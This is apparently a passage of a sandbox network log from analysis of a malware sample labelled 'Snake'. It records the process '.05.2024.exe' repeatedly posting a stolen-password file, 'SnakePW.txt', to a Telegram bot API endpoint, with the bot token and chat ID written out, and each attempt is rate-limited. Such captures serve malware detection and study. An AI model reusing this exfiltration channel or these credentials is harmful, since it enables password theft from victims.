2024-09-27 10:53:44 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 63 31 39 30 35 62 66 32 35 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcec1905bf2532Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:45 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:45 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 36 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:45 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 36 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 36","parameters":{"retry_after":36}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	49780	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:46 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dceca6b78bb960 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:46 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 63 61 36 62 37 38 62 62 39 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dceca6b78bb960Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:46 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:46 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 35 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:46 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 35 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 35","parameters":{"retry_after":35}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	49781	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:47 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dced03a557fb41 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:47 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 64 30 33 61 35 35 37 66 62 34 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dced03a557fb41Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:47 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:47 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 34 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:47 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 34 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 34","parameters":{"retry_after":34}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	49782	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:48 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dced56b36c4986 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:48 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 64 35 36 62 33 36 63 34 39 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dced56b36c4986Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:48 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:48 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 33 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:48 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 33 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 33","parameters":{"retry_after":33}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	49783	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:49 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dceda29d3c6d36 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:49 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 64 61 32 39 64 33 63 36 64 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dceda29d3c6d36Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:49 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:49 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 32 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:49 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 32 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 32","parameters":{"retry_after":32}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	49784	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:50 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcedf825b5defe Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:50 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 64 66 38 32 35 62 35 64 65 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcedf825b5defeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:50 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:50 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 31 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:50 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 31 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 31","parameters":{"retry_after":31}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.7	49785	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:51 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcee495f473e47 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:51 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 65 34 39 35 66 34 37 33 65 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcee495f473e47Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:51 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:51 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 30 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:51 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 30 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 30","parameters":{"retry_after":30}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.7	49786	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:52 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcee9ede9ecfcb Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:52 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 65 39 65 64 65 39 65 63 66 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcee9ede9ecfcbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:52 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:52 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 29 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:52 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 29","parameters":{"retry_after":29}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.7	49787	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:53 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dceef1595bfa24 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:53 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 65 66 31 35 39 35 62 66 61 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dceef1595bfa24Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:54 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:54 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 27 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:54 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 37 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 37 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 27","parameters":{"retry_after":27}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.7	49788	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:54 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcef804a628f99 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:54 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 38 30 34 61 36 32 38 66 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcef804a628f99Content-Disposition: form-data; name="document"; 